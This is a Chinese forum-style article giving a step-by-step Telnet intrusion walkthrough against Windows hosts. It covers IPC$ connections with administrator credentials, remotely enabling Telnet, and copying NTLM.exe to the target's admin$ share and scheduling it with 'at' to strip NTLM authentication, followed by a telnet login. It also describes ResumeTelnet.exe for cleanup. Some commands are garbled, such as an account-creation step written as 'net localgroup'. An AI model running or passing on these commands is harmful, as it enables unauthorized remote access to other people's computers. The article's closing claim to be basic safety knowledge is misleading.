Telnet入侵指令區(qū)分
發(fā)表時間:2023-07-03 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]簡單介紹關(guān)于NTLM驗證 由于Telnet功能太強(qiáng)大, 而且也是入侵者使用最頻繁的登錄手段之一, 因此微軟公司為Telnet添加了身份驗證, 稱為NTLM驗證, 它要求Telnet終端除...
簡單介紹關(guān)于NTLM驗證
由于Telnet功能太強(qiáng)大, 而且也是入侵者使用最頻繁的登錄手段之一, 因此微軟公司為Telnet添加了身份驗證, 稱為NTLM驗證, 它要求Telnet終端除了需要有Telnet服務(wù)主機(jī)的用戶名和密碼外, 還需要滿足NTLM驗證關(guān)系。 NTLM驗證大大增強(qiáng)了Telnet主機(jī)的安全性, 就像一只攔路虎把很多入侵者拒之門外。 (關(guān)于NTLM我有寫一個專門帖子。 。 各位可以去看看)
1.使用telnet連接主機(jī)
指令格式(cmd):telnet 192.168.0.0 連接端口號
如果要斷開。 。 就是exit。 。
這個本人寫了一個很詳細(xì)的帖子發(fā)表在黑盟“遠(yuǎn)程開啟telnet“
2.典型telnet入侵攻略
第一步:建立IPC$連接(本人也寫了很詳細(xì)關(guān)于IPC$連接的方法),
第二步:開啟遠(yuǎn)程telnet連接, 首先在cmd(確定此時的根目錄是目標(biāo)的)輸入指令。 。 service 開啟service項目。 。 。 仔細(xì)找找。 。 。 就有Telnet服務(wù)項。 。 。 。 把它打開。 。 。
第三步:取消IPC$連接:net use 192.168.0.0 /del
第四步:去掉NTLM驗證, 如果沒有去除目標(biāo)上的NTLM驗證, 在登錄目標(biāo)的電腦的時候就會失敗。
其實(shí)方法有很多種。 。 。 本人就介紹我最常用的一個。 。 也是最簡單的方法吧。 。 。
首先, 在本地計算機(jī)上建立一個與遠(yuǎn)程主機(jī)上相同的賬號和密碼。
指令:net localgroup alpha /add 不過確定對方的賬號也是alpha。 。 因為要相同的。 。
第二步:通過“開始”→“程序”→“附件”找到“命令提示符”, 使用鼠標(biāo)右鍵單擊“命令提示符”, 然后選擇“屬性”。
在“以其他用戶身份運(yùn)行(U)”前面挑上挑。 。 然后點(diǎn)。 。 “確定”接著。 。 仍然按照上述路徑找到“命令提示符”(cmd)。 。 之后用左健打開它。 。 。 。
之后寫上用戶名和密碼。 。 。 alpha的
然后點(diǎn)確定。 。 。 得到cmd shell框。 。 。
之后輸入我們的指令:telnet 192.168.0.0
現(xiàn)在就會顯示一個更新后的cmd shell。 。 這個shell就192.168.0.0上的。 。 。
其實(shí)去掉NTLM驗證的方法很多。 。 。 我再介紹給大家一個方法。 。 。
這個方法就是超級菜鳥話。 。 。 因為我們需要用到一個工具。 。 NTLM.exe。 。 這個工具就像是3389.exe一樣。 。 只要把3389.exe傳到一臺機(jī)器上去執(zhí)行。 。 那臺機(jī)器上的3389端口就會自動打開。 。 。
NTLM.exe的運(yùn)作概念和3389.exe是一樣的。 。 。 我們需要做的就是把我們的NTLM.exe傳到192.168.0.0這個機(jī)器上。 。 。
首先:開cmd。 。
然后輸入指令:net use \\192.168.0.0\ipc$*""\user:administrator
之后再輸入指令:copy c:\NTLM.exe \\192.168.0.0\admin$
解釋一下:\admin$是使用192.168.0.0主機(jī)上的admin用戶共享權(quán)限。 。 。 。
然后再輸入察看時間指令:net time \\192.168.0.0
我們假如對方的時間是2007/9/21 下午3點(diǎn)21分。 。 。
之后再輸入執(zhí)行指令:at \\192.168.0.0 15:22 NTLM.exe
解釋一下:15:22是24小時至的下午3點(diǎn)22分。 。 。 cmd shell輸入指令時一定要寫24小時的。 。
之后當(dāng)按回車確定后得到:新增加一項作業(yè) 或者是什么指令成功完成的提示字后。 。 。 等待1分鐘。 。 。 讓cmd完成我們的shell command。 。 。
之后我們再輸入指令:telnet 192.168.0.0
Ok.........................大功告成。 。 。 。
如果要恢復(fù)NTLM驗證。 。 。 我們要用到一個shell工具:resumetelnet.exe
resumetelnet.exe使用的方法是這樣的。 。 。
命令格式:ResumeTelnet.exe \\\\server name password
其中server name是主機(jī)域名或者是IP都可以。 。 。 我們就寫192.168.0.0
password當(dāng)然就是密碼了。 。 。 。
回車確定。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 當(dāng)顯示the command completed successfully后。 。 一切完成。 。 。 。 。 。 。 。 。 。 。 。
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費(fèi)電腦中毒的煩擾。
